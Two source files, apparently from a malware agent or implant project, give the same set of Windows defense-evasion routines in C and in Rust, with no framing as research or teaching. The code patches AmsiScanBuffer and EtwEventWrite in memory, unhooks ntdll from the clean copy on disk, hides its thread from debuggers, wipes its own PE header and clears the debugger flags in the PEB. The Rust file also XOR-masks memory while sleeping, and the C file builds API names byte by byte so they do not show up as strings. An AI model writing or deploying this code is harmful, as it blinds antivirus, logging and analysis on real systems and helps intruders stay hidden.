File: agent_c/evasion.c
#include <windows.h>
#include <string.h>

typedef LONG (NTAPI *pNtSetInformationThread)(HANDLE, ULONG, PVOID, ULONG);
typedef LONG (NTAPI *pNtQueryInformationProcess)(HANDLE, ULONG, PVOID, ULONG, PULONG);

static void evasion_patch_amsi(void)
{
    char lib[9];
    lib[0]='a'; lib[1]='m'; lib[2]='s'; lib[3]='i';
    lib[4]='.'; lib[5]='d'; lib[6]='l'; lib[7]='l'; lib[8]=0;

    char api[15];
    api[0]='A'; api[1]='m'; api[2]='s'; api[3]='i';
    api[4]='S'; api[5]='c'; api[6]='a'; api[7]='n';
    api[8]='B'; api[9]='u'; api[10]='f'; api[11]='f';
    api[12]='e'; api[13]='r'; api[14]=0;

    HMODULE h = LoadLibraryA(lib);
    if (!h) return;
    FARPROC addr = GetProcAddress(h, api);
    if (!addr) return;

    unsigned char patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
    DWORD old;
    VirtualProtect((LPVOID)addr, sizeof(patch), PAGE_EXECUTE_READWRITE, &old);
    memcpy((void*)addr, patch, sizeof(patch));
    VirtualProtect((LPVOID)addr, sizeof(patch), old, &old);
}

static void evasion_patch_etw(void)
{
    char api[14];
    api[0]='E'; api[1]='t'; api[2]='w'; api[3]='E';
    api[4]='v'; api[5]='e'; api[6]='n'; api[7]='t';
    api[8]='W'; api[9]='r'; api[10]='i'; api[11]='t';
    api[12]='e'; api[13]=0;

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return;
    FARPROC addr = GetProcAddress(ntdll, api);
    if (!addr) return;

    unsigned char patch[] = { 0x33, 0xC0, 0xC3 };
    DWORD old;
    VirtualProtect((LPVOID)addr, sizeof(patch), PAGE_EXECUTE_READWRITE, &old);
    memcpy((void*)addr, patch, sizeof(patch));
    VirtualProtect((LPVOID)addr, sizeof(patch), old, &old);
}

static void evasion_unhook_ntdll(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return;

    char path[MAX_PATH];
    GetSystemDirectoryA(path, MAX_PATH);
    strcat(path, "\\ntdll.dll");

    HANDLE hFile = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL,
                               OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) return;

    HANDLE hMap = CreateFileMappingA(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
    if (!hMap) { CloseHandle(hFile); return; }

    LPVOID pMap = MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0);
    if (!pMap) { CloseHandle(hMap); CloseHandle(hFile); return; }

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ntdll;
    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)ntdll + dos->e_lfanew);
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);

    PIMAGE_DOS_HEADER fdos = (PIMAGE_DOS_HEADER)pMap;
    PIMAGE_NT_HEADERS fnt = (PIMAGE_NT_HEADERS)((BYTE*)pMap + fdos->e_lfanew);
    (void)fnt;

    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        if (memcmp(sec[i].Name, ".text", 5) == 0) {
            LPVOID textAddr = (BYTE*)ntdll + sec[i].VirtualAddress;
            DWORD textSize = sec[i].Misc.VirtualSize;
            LPVOID cleanText = (BYTE*)pMap + sec[i].PointerToRawData;
            DWORD old;
            VirtualProtect(textAddr, textSize, PAGE_EXECUTE_READWRITE, &old);
            memcpy(textAddr, cleanText, textSize);
            VirtualProtect(textAddr, textSize, old, &old);
            break;
        }
    }

    UnmapViewOfFile(pMap);
    CloseHandle(hMap);
    CloseHandle(hFile);
}

static void evasion_hide_thread(void)
{
    char api[24];
    api[0]='N'; api[1]='t'; api[2]='S'; api[3]='e'; api[4]='t';
    api[5]='I'; api[6]='n'; api[7]='f'; api[8]='o'; api[9]='r';
    api[10]='m'; api[11]='a'; api[12]='t'; api[13]='i'; api[14]='o';
    api[15]='n'; api[16]='T'; api[17]='h'; api[18]='r'; api[19]='e';
    api[20]='a'; api[21]='d'; api[22]=0;

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return;
    pNtSetInformationThread fn = (pNtSetInformationThread)GetProcAddress(ntdll, api);
    if (!fn) return;
    fn(GetCurrentThread(), 0x11, NULL, 0);
}

static void evasion_stomp_pe_header(void)
{
    HMODULE base = GetModuleHandleA(NULL);
    if (!base) return;
    DWORD old;
    VirtualProtect((LPVOID)base, 64, PAGE_EXECUTE_READWRITE, &old);
    BYTE *p = (BYTE*)base;
    p[0] = 0; p[1] = 0;
    *(LONG*)(p + 0x3C) = 0;
    VirtualProtect((LPVOID)base, 64, old, &old);
}

static void evasion_patch_debug_flags(void)
{
    char api[28];
    api[0]='N'; api[1]='t'; api[2]='Q'; api[3]='u'; api[4]='e';
    api[5]='r'; api[6]='y'; api[7]='I'; api[8]='n'; api[9]='f';
    api[10]='o'; api[11]='r'; api[12]='m'; api[13]='a'; api[14]='t';
    api[15]='i'; api[16]='o'; api[17]='n'; api[18]='P'; api[19]='r';
    api[20]='o'; api[21]='c'; api[22]='e'; api[23]='s'; api[24]='s';
    api[25]=0;

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return;
    pNtQueryInformationProcess fn = (pNtQueryInformationProcess)GetProcAddress(ntdll, api);
    if (!fn) return;

    struct { PVOID r1; PVOID peb; PVOID r2; PVOID r3; ULONG_PTR r4; PVOID r5; } pbi;
    ULONG rlen = 0;
    memset(&pbi, 0, sizeof(pbi));
    if (fn(GetCurrentProcess(), 0, &pbi, sizeof(pbi), &rlen) != 0) return;
    if (!pbi.peb) return;

    BYTE *peb = (BYTE*)pbi.peb;
    peb[2] = 0;

#ifdef _WIN64
    DWORD flags = *(DWORD*)(peb + 0xBC);
    if (flags & 0x70) *(DWORD*)(peb + 0xBC) = flags & ~0x70;
#else
    DWORD flags = *(DWORD*)(peb + 0x68);
    if (flags & 0x70) *(DWORD*)(peb + 0x68) = flags & ~0x70;
#endif
}

void evasion_run(void)
{
    evasion_patch_amsi();
    evasion_patch_etw();
    evasion_unhook_ntdll();
    evasion_hide_thread();
    evasion_stomp_pe_header();
    evasion_patch_debug_flags();
}

File: agent_rust/src/evasion.rs
use std::ffi::CString;
use std::ptr;
use std::thread;
use std::time::Duration;

type HANDLE = *mut u8;
type HMODULE = *mut u8;
type FARPROC = *mut u8;
type DWORD = u32;
type BOOL = i32;
type NTSTATUS = i32;

extern "system" {
    fn LoadLibraryA(name: *const u8) -> HMODULE;
    fn GetModuleHandleA(name: *const u8) -> HMODULE;
    fn GetProcAddress(module: HMODULE, name: *const u8) -> FARPROC;
    fn VirtualProtect(addr: *mut u8, size: usize, new: DWORD, old: *mut DWORD) -> BOOL;
    fn GetCurrentThread() -> HANDLE;
    fn GetCurrentProcess() -> HANDLE;
}

const PAGE_EXECUTE_READWRITE: DWORD = 0x40;
const THREAD_HIDE_FROM_DEBUGGER: i32 = 0x11;

pub fn run() {
    if cfg!(not(windows)) { return; }
    let _ = patch_amsi();
    let _ = patch_etw();
    let _ = unhook_ntdll();
    let _ = hide_thread();
    let _ = stomp_pe_header();
    let _ = patch_debug_flags();
}

fn patch_amsi() -> Result<(), ()> {
    unsafe {
        let lib_name = CString::new("amsi.dll").unwrap();
        let lib = LoadLibraryA(lib_name.as_ptr() as *const u8);
        if lib.is_null() { return Err(()); }
        let func_name = CString::new("AmsiScanBuffer").unwrap();
        let addr = GetProcAddress(lib, func_name.as_ptr() as *const u8);
        if addr.is_null() { return Err(()); }
        // mov eax, 0x80070057 (E_INVALIDARG); ret
        let patch: [u8; 6] = [0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3];
        let mut old: DWORD = 0;
        VirtualProtect(addr, patch.len(), PAGE_EXECUTE_READWRITE, &mut old);
        ptr::copy_nonoverlapping(patch.as_ptr(), addr, patch.len());
        VirtualProtect(addr, patch.len(), old, &mut old);
        Ok(())
    }
}

fn patch_etw() -> Result<(), ()> {
    unsafe {
        let ntdll_name = CString::new("ntdll.dll").unwrap();
        let ntdll = GetModuleHandleA(ntdll_name.as_ptr() as *const u8);
        if ntdll.is_null() { return Err(()); }
        let func_name = CString::new("EtwEventWrite").unwrap();
        let addr = GetProcAddress(ntdll, func_name.as_ptr() as *const u8);
        if addr.is_null() { return Err(()); }
        // xor eax, eax; ret
        let patch: [u8; 3] = [0x33, 0xC0, 0xC3];
        let mut old: DWORD = 0;
        VirtualProtect(addr, patch.len(), PAGE_EXECUTE_READWRITE, &mut old);
        ptr::copy_nonoverlapping(patch.as_ptr(), addr, patch.len());
        VirtualProtect(addr, patch.len(), old, &mut old);
        Ok(())
    }
}

fn unhook_ntdll() -> Result<(), ()> {
    unsafe {
        let path = "C:\\Windows\\System32\\ntdll.dll";
        let clean = match std::fs::read(path) {
            Ok(d) => d,
            Err(_) => return Err(()),
        };
        let ntdll_name = CString::new("ntdll.dll").unwrap();
        let ntdll = GetModuleHandleA(ntdll_name.as_ptr() as *const u8);
        if ntdll.is_null() { return Err(()); }

        let e_lfanew = *(ntdll.add(0x3C) as *const i32) as usize;
        let file_header = ntdll.add(e_lfanew + 4);
        let num_sections = *(file_header.add(2) as *const u16) as usize;
        let size_of_optional = *(file_header.add(16) as *const u16) as usize;
        let section_headers = file_header.add(20 + size_of_optional);

        for i in 0..num_sections {
            let sec = section_headers.add(i * 40);
            let mut name_buf = [0u8; 8];
            ptr::copy_nonoverlapping(sec, name_buf.as_mut_ptr(), 8);
            if &name_buf[..5] == b".text" {
                let v_size = *(sec.add(8) as *const u32) as usize;
                let v_addr = *(sec.add(12) as *const u32) as usize;
                let raw_ptr = *(sec.add(20) as *const u32) as usize;
                if raw_ptr + v_size > clean.len() { return Err(()); }
                let text_addr = ntdll.add(v_addr);
                let mut old: DWORD = 0;
                VirtualProtect(text_addr, v_size, PAGE_EXECUTE_READWRITE, &mut old);
                ptr::copy_nonoverlapping(clean.as_ptr().add(raw_ptr), text_addr, v_size);
                VirtualProtect(text_addr, v_size, old, &mut old);
                return Ok(());
            }
        }
        Err(())
    }
}

fn hide_thread() -> Result<(), ()> {
    unsafe {
        let ntdll_name = CString::new("ntdll.dll").unwrap();
        let ntdll = GetModuleHandleA(ntdll_name.as_ptr() as *const u8);
        if ntdll.is_null() { return Err(()); }
        let func_name = CString::new("NtSetInformationThread").unwrap();
        let addr = GetProcAddress(ntdll, func_name.as_ptr() as *const u8);
        if addr.is_null() { return Err(()); }
        let func: extern "system" fn(HANDLE, i32, *mut u8, u32) -> NTSTATUS =
            std::mem::transmute(addr);
        func(GetCurrentThread(), THREAD_HIDE_FROM_DEBUGGER, ptr::null_mut(), 0);
        Ok(())
    }
}

fn stomp_pe_header() -> Result<(), ()> {
    unsafe {
        let base = GetModuleHandleA(ptr::null());
        if base.is_null() { return Err(()); }
        let mut old: DWORD = 0;
        VirtualProtect(base, 64, PAGE_EXECUTE_READWRITE, &mut old);
        *base = 0;
        *(base.add(1)) = 0;
        *(base.add(0x3C) as *mut i32) = 0;
        VirtualProtect(base, 64, old, &mut old);
        Ok(())
    }
}

fn patch_debug_flags() -> Result<(), ()> {
    unsafe {
        let ntdll_name = CString::new("ntdll.dll").unwrap();
        let ntdll = GetModuleHandleA(ntdll_name.as_ptr() as *const u8);
        if ntdll.is_null() { return Err(()); }
        let func_name = CString::new("NtQueryInformationProcess").unwrap();
        let addr = GetProcAddress(ntdll, func_name.as_ptr() as *const u8);
        if addr.is_null() { return Err(()); }
        let func: extern "system" fn(HANDLE, u32, *mut usize, u32, *mut u32) -> NTSTATUS =
            std::mem::transmute(addr);
        let mut pbi: usize = 0;
        let mut ret_len: u32 = 0;
        let status = func(GetCurrentProcess(), 0, &mut pbi, std::mem::size_of::<usize>() as u32, &mut ret_len);
        if status != 0 || pbi == 0 { return Err(()); }
        let peb = pbi as *mut u8;
        *peb.add(2) = 0; // BeingDebugged = false
        let flag_offset = if std::mem::size_of::<usize>() == 8 { 0xBC } else { 0x68 };
        let flags = *(peb.add(flag_offset) as *const u32);
        if flags & 0x70 != 0 {
            *(peb.add(flag_offset) as *mut u32) = flags & !0x70;
        }
        Ok(())
    }
}

pub fn sleep_mask(secs: u64, sensitive: &mut [u8]) {
    let mut key = [0u8; 32];
    for (i, b) in key.iter_mut().enumerate() {
        *b = (i as u8)
            .wrapping_mul(31)
            .wrapping_add(secs as u8)
            .wrapping_add((std::time::SystemTime::now()
                .duration_since(std::time::UNIX_EPOCH)
                .unwrap_or_default()
                .subsec_nanos() >> (i & 7)) as u8);
    }
    for (i, b) in sensitive.iter_mut().enumerate() {
        *b ^= key[i & 31];
    }
    thread::sleep(Duration::from_secs(secs.max(1)));
    for (i, b) in sensitive.iter_mut().enumerate() {
        *b ^= key[i & 31];
    }
    key.iter_mut().for_each(|b| *b = 0);
}
